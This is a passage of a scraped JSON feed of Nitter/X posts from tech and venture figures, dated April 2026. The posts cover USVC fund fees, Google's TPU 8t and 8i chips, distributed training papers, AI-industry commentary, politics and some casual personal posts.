third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT @ricemoochie: old pvsm", + "url": "https://nitter.net/satoshibun/status/2047641016463712763#m", + "published_at": "2026-04-24T11:37:16+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": 